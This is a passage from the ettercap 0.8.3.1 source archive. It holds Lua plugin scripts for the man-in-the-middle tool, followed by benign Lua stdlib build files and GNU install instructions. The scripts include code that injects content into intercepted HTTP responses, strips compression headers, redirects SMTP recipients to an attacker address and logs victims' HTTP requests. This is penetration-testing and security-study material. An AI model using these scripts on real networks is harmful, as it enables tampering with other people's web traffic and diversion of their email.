<= 0 then return body end local padded_sep = ">" .. string.rep(" ", len) .. "<" local modified_body = string.gsub(body, '><',padded_sep, 1) return modified_body end -- We only want to mess around with TCP streams that have data. packetrule = function(packet_object) if packet.is_tcp(packet_object) == false then return false end if packet_object.DATA.len == 0 then return false end return true end local session_key_func = shortsession.tcp_session("tcp_session_demo") local create_namespace = ettercap.reg.create_namespace local http_states = {} http_states.request_seen = 1 http_states.response_seen = 2 http_states.body_seen = 3 http_states.injected = 4 function handle_request(session_data, packet_object) local buf = packet.read_data(packet_object, 4) if buf == "GET " then session_data.http_state = http_states.request_seen end if session_data.http_state == http_states.request_seen then local request = packet.read_data(packet_object) local mod_request = string.gsub(request, '[Aa]ccept-[Ee]ncoding', "Xccept-Xncoding", 1) if not request == mod_request then packet.set_data(packet_object, mod_request) end end end function nocase (s) s = string.gsub(s, "%a", function (c) return string.format("[%s%s]", string.lower(c), string.upper(c)) end) return s end local inject_patterns = { nocase("( ])"), nocase("( ])"), nocase("( ])"), nocase("( ])"), nocase("(> ])") } local inject_string = '%1' local inject_str_len = string.len(inject_string) - 2 function inject_body(orig_body) if orig_body == nil then return nil end local orig_body_len = string.len(orig_body) -- Try to shrink the body down. local shrunk_body = shrink_http_body(orig_body) local shrunk_body_len = string.len(shrunk_body) local delta = orig_body_len - shrunk_body_len - inject_str_len if delta < 0 then -- no room to inject our stuff! return. return nil end for i,pattern in pairs(inject_patterns) do local offset = string.find(shrunk_body, pattern) local modified_body = string.gsub(shrunk_body, pattern, inject_string, 1) local modified_body_len = string.len(modified_body) if not (modified_body_len == shrunk_body_len) then -- Alright, let's pad things a little bit. local padded_body = pad_http_body(modified_body, delta) return padded_body end end return nil end function handle_response(session_data, packet_object) -- If we do'nt have a state, then we shouldn't be doing anything! if session_data.http_state == nil then return nil end -- If we have already injected, then don't do anything. if session_data.http_state == http_states.injected then return nil end if session_data.http_state == http_states.request_seen then local buf = packet.read_data(packet_object, 8) if not buf == "HTTP/1." then return nil end session_data.http_state = http_states.response_seen -- Since we're in the header, let's see if we can find the body. end local buf = packet.read_data(packet_object) local header = nil local body = nil if session_data.http_state == http_states.response_seen then -- Let's try to find the body. local split_header, split_body = split_http(buf) if not split_body then -- No dice, didn't find the body. return nil end -- Keep track of our header. if split_header then header = split_header end -- Stash our body. body = split_body session_data.http_state = http_states.body_seen end if session_data.http_state == http_states.body_seen then -- If we didn't already grab the body, then we aren't in the first packet -- for the response. That means that -- if not body then body = buf end local new_body = inject_body(body) if new_body == nil then return nil end session_data.http_state = http_states.injected if header == nil then header = "" end local new_data = header .. new_body -- Set the modified data packet.set_data(packet_object, new_data) end end -- Here's your action. action = function(packet_object) local session_id = session_key_func(packet_object) if not session_id then -- If we don't have session_id, then bail. return nil end local ident_ptr = ffi.new("void *") local ident_ptr_ptr = ffi.new("void *[1]", ident_ptr) local ident_len = ffi.C.tcp_create_ident(ident_ptr_ptr, packet_object); local session_ptr = ffi.new("struct ec_session *") local session_ptr_ptr = ffi.new("struct ec_session *[1]", session_ptr) local ret = ffi.C.session_get(session_ptr_ptr, ident_ptr_ptr[0], ident_len) if ret == -ffi.C.E_NOTFOUND then return nil end -- Find the direction of our current TCP packet. -- 0 == client -> server -- 1 == server -> client local dir = ffi.C.tcp_find_direction(session_ptr_ptr[0].ident, ident_ptr_ptr[0]) -- Now we are going to try to figure out if which direction things are -- going in. -- Get our session data... local session_data = create_namespace(session_id) if dir == 0 then handle_request(session_data, packet_object) else handle_response(session_data, packet_object) end -- ettercap.log("tcp_session_demo: %d %s:%d -> %s:%d - state: %s\n", dir, src_ip, src_port, -- dst_ip, dst_port, tostring(session_data.http_state)) end ettercap-0.8.3.1/src/lua/share/scripts/http_requests.lua000664 000000 000000 00000005240 13711276346 023241 0ustar00rootroot000000 000000 --- -- -- Created by Ryan Linn and Mike Ryan -- Copyright (C) 2012 Trustwave Holdings, Inc. description = "Script to show HTTP requsts"; local http = require("http") local packet = require("packet") local bin = require("bit") hook_point = http.hook packetrule = function(packet_object) -- If this isn't a tcp packet, it's not really a HTTP request -- since we're hooked in the HTTP dissector, we can assume that this -- should never fail, but it's a good sanity check if packet.is_tcp(packet_object) == false then return false end return true end -- Here's your action. action = function(packet_object) local p = packet_object -- Parse the http data into an HTTP object local hobj = http.parse_http(p) -- If there's no http object, get out if hobj == nil then return end -- Get out session key for tracking req->reply pairs local session_id = http.session_id(p,hobj) -- If we can't track sessions, this won't work, get out if session_id == nil then return end -- We have a session, lets get our registry space local reg = ettercap.reg.create_namespace(session_id) -- If it's a request, save the request to the registry -- We'll need this for the response if hobj.request then reg.request = hobj -- we have a response object, let't put the log together elseif hobj.response then -- If we haven't seen the request, we don't have anything to share if not reg.request then return end -- Get the status code local code = hobj.status_code -- Build the request URL -- If we have a 2XX or 4XX or 5XX code, we won't need to log redirect -- so just log the request and code if code >= 200 and code < 300 or code >= 400 then ettercap.log("HTTP_REQ: %s:%d -> %s:%d %s %s %d (%s)\n", packet.dst_ip(p), packet.dst_port(p), packet.src_ip(p), packet.src_port(p), reg.request.verb ,reg.request.url , hobj.status_code, hobj.status_msg) -- These codes require redirect, so log the redirect as well elseif code >= 300 and code <= 303 then local redir = "" -- Get the redirect location if hobj.headers["Location"] then redir = hobj.headers["Location"] end -- Log the request/response with the redirect ettercap.log("HTTP_REQ: %s:%d -> %s:%d %s %s -> %s %d (%s)\n", packet.dst_ip(p), packet.dst_port(p), packet.src_ip(p), packet.src_port(p), reg.request.verb ,reg.request.url, redir, hobj.status_code, hobj.status_msg) end end end ettercap-0.8.3.1/src/lua/share/scripts/inject_http.lua000664 000000 000000 00000006322 13711276346 022644 0ustar00rootroot000000 000000 --- -- Copyright (C) Ryan Linn and Mike Ryan -- -- This program is free software; you can redistribute it and/or modify -- it under the terms of the GNU General Public License as published by -- the Free Software Foundation; either version 2 of the License, or -- (at your option) any later version. -- -- This program is distributed in the hope that it will be useful, -- but WITHOUT ANY WARRANTY; without even the implied warranty of -- MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -- GNU General Public License for more details. -- -- You should have received a copy of the GNU General Public License -- along with this program; if not, write to the Free Software -- Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. description = "This is a test script that will inject HTTP stuff"; local eclib = require('eclib') local hook_points = require("hook_points") local shortpacket = require("shortpacket") local shortsession = require("shortsession") local packet = require("packet") -- We have to hook at the filtering point so that we are certain that all the -- dissectors hae run. hook_point = hook_points.filter function split_http(str) local start,finish,header,body = string.find(str, '(.-\r?\n\r?\n)(.*)') return start,finish,header, body end function shrink_http_body(body) local modified_body = string.gsub(body, '>%s*<','><') return modified_body end -- Cache our starts-with function... local sw = shortpacket.data_starts_with("HTTP/1.") -- We only want to match packets that look like HTTP responses. packetrule = function(packet_object) if packet.is_tcp(packet_object) == false then return false end -- Check to see if it starts with the right stuff. return sw(packet_object) end local session_key_func = shortsession.ip_session("inject_http") -- Here's your action. action = function(po) local session_id = session_key_func(po) if not session_id then -- If we don't have session_id, then bail. return nil end --local src_ip = "" --local dst_ip = "" local src_ip = packet.src_ip(po) local dst_ip = packet.dst_ip(po) ettercap.log("inject_http: " .. src_ip .. " -> " .. dst_ip .. "\n") -- Get the full buffer.... reg = ettercap.reg.create_namespace(session_id) local buf = packet.read_data(po) -- Split the header/body up so we can manipulate things. local start,finish,header, body = split_http(buf) -- local start,finish,header,body = string.find(buf, '(.-\r?\n\r?\n)(.*)') if not reg['a'] then ettercap.log("Initial hit\n") reg['a'] = 1 else ettercap.log(tostring(reg['a']) .. " hit\n") reg['a'] = reg['a'] + 1 end if (not (start == nil)) then -- We've got a proper split. local orig_body_len = string.len(body) local modified_body = string.gsub(body, '','') -- We've tweaked things, so let's update the data. if (not(modified_body == body)) then ettercap.log("inject_http action : We modified the HTTP response!\n") local modified_data = header .. modified_body -- This takes care of setting the packet data, as well as flagging it -- as modified. packet.set_data(po, modified_data) end end end ettercap-0.8.3.1/src/lua/share/scripts/inject_http_demo.lua000664 000000 000000 00000023651 13711276346 023654 0ustar00rootroot000000 000000 --- -- Copyright (C) Ryan Linn and Mike Ryan -- -- This program is free software; you can redistribute it and/or modify -- it under the terms of the GNU General Public License as published by -- the Free Software Foundation; either version 2 of the License, or -- (at your option) any later version. -- -- This program is distributed in the hope that it will be useful, -- but WITHOUT ANY WARRANTY; without even the implied warranty of -- MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -- GNU General Public License for more details. -- -- You should have received a copy of the GNU General Public License -- along with this program; if not, write to the Free Software -- Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. description = "This demonstrates TCP session tracking."; local ffi = require('ettercap_ffi') local eclib = require('eclib') local hook_points = require("hook_points") local shortsession = require("shortsession") local packet = require("packet") require("os") -- We have to hook at the filtering point so that we are certain that all the -- dissectors hae run. hook_point = hook_points.filter function split_http(str) local break_start, header_end= string.find(str, '\r?\n\r?\n') if header_end == nil then -- We only see the headers. So, that's all we got. header_end = string.len(str) end local header = string.sub(str, 0, header_end) local body = string.sub(str,header_end+1) return header, body end function shrink_http_body(body) --local modified_body = string.gsub(body, '>%s*<','><') local body_len = string.len(body) if body_len == 155 then -- ettercap.log("Here's the body: %s\n", body) end -- ettercap.log("Trying to shrink body size %d\n", body_len) local modified_body = string.gsub(body, '%s+',' ') return modified_body end function pad_http_body(body, len) if len <= 0 then return body end local padded_sep = ">" .. string.rep(" ", len) .. "<" local modified_body = string.gsub(body, '><',padded_sep, 1) return modified_body end -- We only want to mess around with TCP streams that have data. packetrule = function(packet_object) if packet.is_tcp(packet_object) == false then return false end if packet_object.DATA.len == 0 then return false end return true end local tcp_session_key_func = shortsession.tcp_session("tcp_session_demo") local ip_session_key_func = shortsession.ip_session("tcp_session_demo") local create_namespace = ettercap.reg.create_namespace local http_states = {} http_states.request_seen = 1 http_states.response_seen = 2 http_states.response_is_html = 3 http_states.body_seen = 4 http_states.injected = 5 function handle_request(session_data, packet_object) local tcp_session_data = session_data.tcp_session_data local buf = packet.read_data(packet_object, 4) if buf == "GET " then tcp_session_data.http_state = http_states.request_seen end if tcp_session_data.http_state == http_states.request_seen then local request = packet.read_data(packet_object) -- local mod_request = string.gsub(request, '[Aa]ccept.[Ee]ncoding', "Xccept-Xncoding") local mod_request = string.gsub(request, 'Accept.Encoding', "Xccept-Xncoding") if not (request == mod_request) then packet.set_data(packet_object, mod_request) -- ettercap.log("Tweaked accept-encoding\n") else -- ettercap.log("request: %s\n", request) -- ettercap.log("Couldn't find accept-encoding\n") end end end function nocase (s) s = string.gsub(s, "%a", function (c) return string.format("[%s%s]", string.lower(c), string.upper(c)) end) return s end local inject_patterns = { nocase("( ])"), nocase("( ])"), nocase("( ])"), nocase("( ])"), nocase("(> ])") } local inject_urls = { '', '', '' } function inject_body(session_data,orig_body) local tcp_session_data = session_data.tcp_session_data local ip_session_data = session_data.ip_session_data if orig_body == nil then return nil end local orig_body_len = string.len(orig_body) -- ettercap.log("Orig body len %d\n", orig_body_len) -- Try to shrink the body down. local shrunk_body = shrink_http_body(orig_body) local shrunk_body_len = string.len(shrunk_body) -- ettercap.log("Shrunk body len %d\n", shrunk_body_len) -- Add rotating string here if not ip_session_data.count then ip_session_data.count = 0 ip_session_data.time = 0 end if os.time() - ip_session_data.time > 5 then ettercap.log("Adding one\n") ip_session_data.count = ip_session_data.count + 1 if ip_session_data.count > 3 or ip_session_data.count == 0 then ettercap.log("Resetting count\n") ip_session_data.count = 1 end ip_session_data.time = os.time() end local inject_string = inject_urls[ip_session_data.count] local inject_str_len = string.len(inject_string) - 2 local delta = orig_body_len - shrunk_body_len - inject_str_len -- ettercap.log("Delta %d = %d - %d - %d\n", delta , orig_body_len , shrunk_body_len , inject_str_len) if delta < 0 then -- no room to inject our stuff! return. return nil end for i,pattern in pairs(inject_patterns) do local modified_body = string.gsub(shrunk_body, pattern, inject_string, 1) local modified_body_len = string.len(modified_body) if not (modified_body_len == shrunk_body_len) then -- Alright, let's pad things a little bit. local padded_body = pad_http_body(modified_body, delta) return padded_body end end return nil end function handle_response(session_data, packet_object) local tcp_session_data = session_data.tcp_session_data -- ettercap.log("handle_response...\n") -- If we do'nt have a state, then we shouldn't be doing anything! if tcp_session_data.http_state == nil then -- ettercap.log("No http state...\n") return nil end -- If we have already injected, then don't do anything. if tcp_session_data.http_state == http_states.injected then -- ettercap.log("already injected!\n") return nil end if tcp_session_data.http_state == http_states.request_seen then local buf = packet.read_data(packet_object, 8) if not buf == "HTTP/1." then -- ettercap.log("not an HTTP response\n") return nil end tcp_session_data.http_state = http_states.response_seen -- Since we're in the header, let's see if we can find the body. end local buf = packet.read_data(packet_object) local header = nil local body = nil if tcp_session_data.http_state <= http_states.response_is_html then -- Let's try to find the body. local split_header, split_body = split_http(buf) -- Keep track of our header. if split_header then header = split_header if string.find(split_header, "text/html") then tcp_session_data.http_state = http_states.response_is_html end end if not split_body then -- No dice, didn't find the body. return nil end if not tcp_session_data.http_state == http_states.response_is_html then -- This isn't an HTML response . -- ettercap.log("This isn't an HTML response!\n") tcp_session_data.http_state = nil return nil end tcp_session_data.http_state = http_states.body_seen -- Stash our body. body = split_body end tcp_session_data.http_state = http_states.body_seen if tcp_session_data.http_state == http_states.body_seen then -- If we didn't already grab the body, then we aren't in the first packet -- for the response. That means that -- if not body then body = buf end local new_body = inject_body(session_data,body) if new_body == nil then -- ettercap.log("Could not inject.\n") return nil end tcp_session_data.http_state = http_states.injected if header == nil then header = "" end local new_data = header .. new_body -- Set the modified data packet.set_data(packet_object, new_data) end end -- Here's your action. action = function(packet_object) local tcp_session_id = tcp_session_key_func(packet_object) if not tcp_session_id then -- If we don't have tcp_session_id, then bail. return nil end local ip_session_id = ip_session_key_func(packet_object) if not ip_session_id then -- If we don't have ip_session_id, then bail. return nil end local ident_ptr = ffi.new("void *") local ident_ptr_ptr = ffi.new("void *[1]", ident_ptr) local ident_len = ffi.C.tcp_create_ident(ident_ptr_ptr, packet_object); local session_ptr = ffi.new("struct ec_session *") local session_ptr_ptr = ffi.new("struct ec_session *[1]", session_ptr) local ret = ffi.C.session_get(session_ptr_ptr, ident_ptr_ptr[0], ident_len) if ret == -ffi.C.E_NOTFOUND then return nil end -- Find the direction of our current TCP packet. -- 0 == client -> server -- 1 == server -> client local dir = ffi.C.tcp_find_direction(session_ptr_ptr[0].ident, ident_ptr_ptr[0]) -- Now we are going to try to figure out if which direction things are -- going in. -- Get our session data... local tcp_session_data = create_namespace(tcp_session_id) local ip_session_data = create_namespace(ip_session_id) local session_data = {} session_data.tcp_session_data = tcp_session_data session_data.ip_session_data = ip_session_data if dir == 0 then handle_request(session_data, packet_object) else handle_response(session_data, packet_object) end local src_ip = packet.src_ip(packet_object) local dst_ip = packet.dst_ip(packet_object) local src_port = ffi.C.ntohs(packet_object.L4.src) local dst_port = ffi.C.ntohs(packet_object.L4.dst) -- ettercap.log("tcp_session_demo: %d %s:%d -> %s:%d - state: %s\n", dir, src_ip, src_port, -- dst_ip, dst_port, tostring(tcp_session_data.http_state)) end ettercap-0.8.3.1/src/lua/share/scripts/smtp_redir.lua000664 000000 000000 00000002534 13711276346 022502 0ustar00rootroot000000 000000 --- -- -- Created by Ryan Linn and Mike Ryan -- Copyright (C) 2012 Trustwave Holdings, Inc. description = "Snags SMTP credentials"; local hook_points = require("hook_points") local stdlib = require("std") hook_point = hook_points.tcp packetrule = function(packet_object) return(packet_object:is_tcp() and packet_object:has_data() and packet_object:dst_port() == 25) end local RCPT_PAT = "^(RCPT TO:)([^\r\n]*)" local evil_address = "" -- Here's your action. action = function(packet_object) -- Read the packet data data = packet_object:read_data() local start, e, cmd, recipient = data:find(RCPT_PAT) if start == nil then return nil end -- Calculate the different between the address we are replacing and our own. local padding_amount = recipient:len() - evil_address:len() if padding_amount < 0 then -- Address too small! Can't inject. return nil end -- Generate new recipient, pad the front with spaces " " local inj_addr = string.rep(" ", padding_amount) .. evil_address -- Swap original recipient for our bad-guy address: -- "RCPT TO: \r\n" local new_msg = data:gsub(RCPT_PAT, "%1" .. inj_addr) ettercap.log("Redirected email: %s -> %s\n", recipient, evil_address) -- Set it and forget it. packet_object:set_data(new_msg) end ettercap-0.8.3.1/src/lua/share/scripts/tcp_session_demo.lua000664 000000 000000 00000016031 13711276346 023664 0ustar00rootroot000000 000000 --- -- Copyright (C) Ryan Linn and Mike Ryan -- -- This program is free software; you can redistribute it and/or modify -- it under the terms of the GNU General Public License as published by -- the Free Software Foundation; either version 2 of the License, or -- (at your option) any later version. -- -- This program is distributed in the hope that it will be useful, -- but WITHOUT ANY WARRANTY; without even the implied warranty of -- MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -- GNU General Public License for more details. -- -- You should have received a copy of the GNU General Public License -- along with this program; if not, write to the Free Software -- Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. description = "This demonstrates TCP session tracking."; local ffi = require('ettercap_ffi') local eclib = require('eclib') local hook_points = require("hook_points") local shortsession = require("shortsession") local packet = require("packet") -- We have to hook at the filtering point so that we are certain that all the -- dissectors hae run. hook_point = hook_points.filter function split_http(str) local break_start, header_end= string.find(str, '\r?\n\r?\n') if header_end == nil then -- We only see the headers. So, that's all we got. header_end = string.len(str) end local header = string.sub(str, 0, header_end) local body = string.sub(str,header_end+1) return header, body end function shrink_http_body(body) local modified_body = string.gsub(body, '>%s*<','><') return modified_body end function pad_http_body(body, len) if len <= 0 then return body end local padded_sep = ">" .. string.rep(" ", len) .. "<" local modified_body = string.gsub(body, '><',padded_sep, 1) return modified_body end -- We only want to mess around with TCP streams that have data. packetrule = function(packet_object) if packet.is_tcp(packet_object) == false then return false end if packet_object.DATA.len == 0 then return false end return true end local session_key_func = shortsession.tcp_session("tcp_session_demo") local create_namespace = ettercap.reg.create_namespace local http_states = {} http_states.request_seen = 1 http_states.response_seen = 2 http_states.body_seen = 3 http_states.injected = 4 function handle_request(session_data, packet_object) local buf = packet.read_data(packet_object, 4) if buf == "GET " then session_data.http_state = http_states.request_seen end if session_data.http_state == http_states.request_seen then local request = packet.read_data(packet_object) local mod_request = string.gsub(request, '[Aa]ccept-[Ee]ncoding', "Xccept-Xncoding", 1) if not request == mod_request then packet.set_data(packet_object, mod_request) end end end function nocase (s) s = string.gsub(s, "%a", function (c) return string.format("[%s%s]", string.lower(c), string.upper(c)) end) return s end local inject_patterns = { nocase("( ])"), nocase("( ])"), nocase("( ])"), nocase("( ])"), nocase("(> ])") } local inject_string = '%1' local inject_str_len = string.len(inject_string) - 2 function inject_body(orig_body) if orig_body == nil then return nil end local orig_body_len = string.len(orig_body) -- Try to shrink the body down. local shrunk_body = shrink_http_body(orig_body) local shrunk_body_len = string.len(shrunk_body) local delta = orig_body_len - shrunk_body_len - inject_str_len if delta < 0 then -- no room to inject our stuff! return. return nil end for i,pattern in pairs(inject_patterns) do local offset = string.find(shrunk_body, pattern) local modified_body = string.gsub(shrunk_body, pattern, inject_string, 1) local modified_body_len = string.len(modified_body) if not (modified_body_len == shrunk_body_len) then -- Alright, let's pad things a little bit. local padded_body = pad_http_body(modified_body, delta) return padded_body end end return nil end function handle_response(session_data, packet_object) -- If we do'nt have a state, then we shouldn't be doing anything! if session_data.http_state == nil then return nil end -- If we have already injected, then don't do anything. if session_data.http_state == http_states.injected then return nil end if session_data.http_state == http_states.request_seen then local buf = packet.read_data(packet_object, 8) if not buf == "HTTP/1." then return nil end session_data.http_state = http_states.response_seen -- Since we're in the header, let's see if we can find the body. end local buf = packet.read_data(packet_object) local header = nil local body = nil if session_data.http_state == http_states.response_seen then -- Let's try to find the body. local split_header, split_body = split_http(buf) if not split_body then -- No dice, didn't find the body. return nil end -- Keep track of our header. if split_header then header = split_header end -- Stash our body. body = split_body session_data.http_state = http_states.body_seen end if session_data.http_state == http_states.body_seen then -- If we didn't already grab the body, then we aren't in the first packet -- for the response. That means that -- if not body then body = buf end local new_body = inject_body(body) if new_body == nil then return nil end session_data.http_state = http_states.injected if header == nil then header = "" end local new_data = header .. new_body -- Set the modified data packet.set_data(packet_object, new_data) end end -- Here's your action. action = function(packet_object) local session_id = session_key_func(packet_object) if not session_id then -- If we don't have session_id, then bail. return nil end local ident_ptr = ffi.new("void *") local ident_ptr_ptr = ffi.new("void *[1]", ident_ptr) local ident_len = ffi.C.tcp_create_ident(ident_ptr_ptr, packet_object); local session_ptr = ffi.new("struct ec_session *") local session_ptr_ptr = ffi.new("struct ec_session *[1]", session_ptr) local ret = ffi.C.session_get(session_ptr_ptr, ident_ptr_ptr[0], ident_len) if ret == -ffi.C.E_NOTFOUND then return nil end -- Find the direction of our current TCP packet. -- 0 == client -> server -- 1 == server -> client local dir = ffi.C.tcp_find_direction(session_ptr_ptr[0].ident, ident_ptr_ptr[0]) -- Now we are going to try to figure out if which direction things are -- going in. -- Get our session data... local session_data = create_namespace(session_id) if dir == 0 then handle_request(session_data, packet_object) else handle_response(session_data, packet_object) end -- ettercap.log("tcp_session_demo: %d %s:%d -> %s:%d - state: %s\n", dir, src_ip, src_port, -- dst_ip, dst_port, tostring(session_data.http_state)) end ettercap-0.8.3.1/src/lua/share/third-party/000775 000000 000000 00000000000 13711276346 020403 5ustar00rootroot000000 000000 ettercap-0.8.3.1/src/lua/share/third-party/CMakeLists.txt000664 000000 000000 00000000032 13711276346 023136 0ustar00rootroot000000 000000 add_subdirectory(stdlib) ettercap-0.8.3.1/src/lua/share/third-party/stdlib/000775 000000 000000 00000000000 13711276346 021664 5ustar00rootroot000000 000000 ettercap-0.8.3.1/src/lua/share/third-party/stdlib/AUTHORS000664 000000 000000 00000001753 13711276346 022742 0ustar00rootroot000000 000000 Stdlib's contributors --------------------- This file lists major contributors to stdlib. If you think you should be on it, please tell the mailing list (see README for the address). Thanks also to all those who have contributed bug fixes, suggestions and support. Reuben Thomas started and maintains the standard libraries project, wrote many of the libraries, and integrated code from other authors. John Belmonte helped set the project up on lua-users, and contributed to the early organisation of the libraries. The call trace debugging code is based on test/trace-calls.lua from the Lua 5.0 distribution. Jamie Webb contributed several miscellaneous functions from his private standard library. Johann Hibschman supplied the code on which math.floor and math.round were based. Diego Nehab wrote the original version of the mbox parser module. Gary V. Vaughan contributed table key support to the tree module, and the memoize implementation. ettercap-0.8.3.1/src/lua/share/third-party/stdlib/CMakeLists.txt000664 000000 000000 00000000062 13711276346 024422 0ustar00rootroot000000 000000 set(LUA_STDLIB_VERSION 34) add_subdirectory(src) ettercap-0.8.3.1/src/lua/share/third-party/stdlib/GNUmakefile000664 000000 000000 00000004647 13711276346 023751 0ustar00rootroot000000 000000 ## maintainer rules. dont-forget-to-bootstrap = $(wildcard Makefile) ifeq ($(dont-forget-to-bootstrap),) Makefile: Makefile.in ./configure $(MAKE) Makefile.in: autoreconf --force --verbose --install else # Use 'make check V=1' for verbose output, or set SPECL_OPTS to # pass alternative options to specl command. SPECL_OPTS ?= $(specl_verbose_$(V)) specl_verbose_ = $(specl_verbose_$(AM_DEFAULT_VERBOSITY)) specl_verbose_0 = specl_verbose_1 = --verbose --formatter=report include Makefile ROCKSPEC_ENV = $(LUA_ENV) MKROCKSPECS = $(ROCKSPEC_ENV) $(LUA) $(srcdir)/mkrockspecs.lua ROCKSPEC_TEMPLATE = $(srcdir)/$(PACKAGE)-rockspec.lua luarocks-config.lua: $(AM_V_GEN){ \ echo 'rocks_trees = {'; \ echo ' "$(abs_srcdir)/luarocks"'; \ echo '}'; \ } > '$@' rockspecs: luarocks-config.lua rm -f *.rockspec $(MKROCKSPECS) $(PACKAGE) $(VERSION) $(ROCKSPEC_TEMPLATE) $(MKROCKSPECS) $(PACKAGE) git $(ROCKSPEC_TEMPLATE) GIT ?= git tag-release: $(GIT) diff --exit-code && \ $(GIT) tag -f -a -m "Release tag" v$(VERSION)-2 define unpack-distcheck-release rm -rf $(PACKAGE)-$(VERSION)/ && \ tar zxf ../$(PACKAGE)/$(PACKAGE)-$(VERSION).tar.gz && \ cp -a -f $(PACKAGE)-$(VERSION)/* . && \ rm -rf $(PACKAGE)-$(VERSION)/ && \ echo "unpacked $(PACKAGE)-$(VERSION).tar.gz over current directory" && \ echo './configure && make all rockspecs' && \ ./configure --version && ./configure && \ $(MAKE) all rockspecs endef check-in-release: distcheck cd ../$(PACKAGE)-release && \ $(unpack-distcheck-release) && \ $(GIT) add . && \ $(GIT) commit -a -m "Release v$(VERSION)-2" && \ $(GIT) tag -f -a -m "Full source release tag" release-v$(VERSION)-2 ## To test the release process without publishing upstream, use: ## make release WOGER=: GIT_PUBLISH=: GIT_PUBLISH ?= $(GIT) WOGER ?= woger WOGER_ENV = LUA_INIT= LUA_PATH='$(abs_srcdir)/?-git-1.rockspec' WOGER_OUT = $(WOGER_ENV) $(LUA) -l$(PACKAGE) -e release: rockspecs $(MAKE) tag-release && \ $(MAKE) check-in-release && \ $(GIT_PUBLISH) push && $(GIT_PUBLISH) push --tags && \ LUAROCKS_CONFIG=$(abs_srcdir)/luarocks-config.lua luarocks \ --tree=$(abs_srcdir)/luarocks build $(PACKAGE)-$(VERSION)-2.rockspec && \ $(WOGER) lua \ package=$(PACKAGE) \ package_name=$(PACKAGE_NAME) \ version=$(VERSION) \ notes=release-notes-$(VERSION) \ home="`$(WOGER_OUT) 'print (description.homepage)'`" \ description="`$(WOGER_OUT) 'print (description.summary)'`" endif ettercap-0.8.3.1/src/lua/share/third-party/stdlib/INSTALL000664 000000 000000 00000036332 13711276346 022724 0ustar00rootroot000000 000000 Installation Instructions ************************* Copyright (C) 1994, 1995, 1996, 1999, 2000, 2001, 2002, 2004, 2005, 2006, 2007, 2008, 2009 Free Software Foundation, Inc. Copying and distribution of this file, with or without modification, are permitted in any medium without royalty provided the copyright notice and this notice are preserved. This file is offered as-is, without warranty of any kind. Basic Installation ================== Briefly, the shell commands `./configure; make; make install' should configure, build, and install this package. The following more-detailed instructions are generic; see the `README' file for instructions specific to this package. Some packages provide this `INSTALL' file but do not implement all of the features documented below. The lack of an optional feature in a given package is not necessarily a bug. More recommendations for GNU packages can be found in *note Makefile Conventions: (standards)Makefile Conventions. The `configure' shell script attempts to guess correct values for various system-dependent variables used during compilation. It uses those values to create a `Makefile' in each directory of the package. It may also create one or more `.h' files containing system-dependent definitions. Finally, it creates a shell script `config.status' that you can run in the future to recreate the current configuration, and a file `config.log' containing compiler output (useful mainly for debugging `configure'). It can also use an optional file (typically called `config.cache' and enabled with `--cache-file=config.cache' or simply `-C') that saves the results of its tests to speed up reconfiguring. Caching is disabled by default to prevent problems with accidental use of stale cache files. If you need to do unusual things to compile the package, please try to figure out how `configure' could check whether to do them, and mail diffs or instructions to the address given in the `README' so they can be considered for the next release. If you are using the cache, and at some point `config.cache' contains results you don't want to keep, you may remove or edit it. The file `configure.ac' (or `configure.in') is used to create `configure' by a program called `autoconf'. You need `configure.ac' if you want to change it or regenerate `configure' using a newer version of `autoconf'. The simplest way to compile this package is: 1. `cd' to the directory containing the package's source code and type `./configure' to configure the package for your system. Running `configure' might take a while. While running, it prints some messages telling which features it is checking for. 2. Type `make' to compile the package. 3. Optionally, type `make check' to run any self-tests that come with the package, generally using the just-built uninstalled binaries. 4. Type `make install' to install the programs and any data files and documentation. When installing into a prefix owned by root, it is recommended that the package be configured and built as a regular user, and only the `make install' phase executed with root privileges. 5. Optionally, type `make installcheck' to repeat any self-tests, but this time using the binaries in their final installed location. This target does not install anything. Running this target as a regular user, particularly if the prior `make install' required root privileges, verifies that the installation completed correctly. 6. You can remove the program binaries and object files from the source code directory by typing `make clean'. To also remove the files that `configure' created (so you can compile the package for a different kind of computer), type `make distclean'. There is also a `make maintainer-clean' target, but that is intended mainly for the package's developers. If you use it, you may have to get all sorts of other programs in order to regenerate files that came with the distribution. 7. Often, you can also type `make uninstall' to remove the installed files again. In practice, not all packages have tested that uninstallation works correctly, even though it is required by the GNU Coding Standards. 8. Some packages, particularly those that use Automake, provide `make distcheck', which can by used by developers to test that all other targets like `make install' and `make uninstall' work correctly. This target is generally not run by end users. Compilers and Options ===================== Some systems require unusual options for compilation or linking that the `configure' script does not know about. Run `./configure --help' for details on some of the pertinent environment variables. You can give `configure' initial values for configuration parameters by setting variables in the command line or in the environment. Here is an example: ./configure CC=c99 CFLAGS=-g LIBS=-lposix *Note Defining Variables::, for more details. Compiling For Multiple Architectures ==================================== You can compile the package for more than one kind of computer at the same time, by placing the object files for each architecture in their own directory. To do this, you can use GNU `make'. `cd' to the directory where you want the object files and executables to go and run the `configure' script. `configure' automatically checks for the source code in the directory that `configure' is in and in `..'. This is known as a "VPATH" build. With a non-GNU `make', it is safer to compile the package for one architecture at a time in the source code directory. After you have installed the package for one architecture, use `make distclean' before reconfiguring for another architecture. On MacOS X 10.5 and later systems, you can create libraries and executables that work on multiple system types--known as "fat" or "universal" binaries--by specifying multiple `-arch' options to the compiler but only a single `-arch' option to the preprocessor. Like this: ./configure CC="gcc -arch i386 -arch x86_64 -arch ppc -arch ppc64" \ CXX="g++ -arch i386 -arch x86_64 -arch ppc -arch ppc64" \ CPP="gcc -E" CXXCPP="g++ -E" This is not guaranteed to produce working output in all cases, you may have to build one architecture at a time and combine the results using the `lipo' tool if you have problems. Installation Names ================== By default, `make install' installs the package's commands under `/usr/local/bin', include files under `/usr/local/include', etc. You can specify an installation prefix other than `/usr/local' by giving `configure' the option `--prefix=PREFIX', where PREFIX must be an absolute file name. You can specify separate installation prefixes for architecture-specific files and architecture-independent files. If you pass the option `--exec-prefix=PREFIX' to `configure', the package uses PREFIX as the prefix for installing programs and libraries. Documentation and other data files still use the regular prefix. In addition, if you use an unusual directory layout you can give options like `--bindir=DIR' to specify different values for particular kinds of files. Run `configure --help' for a list of the directories you can set and what kinds of files go in them. In general, the default 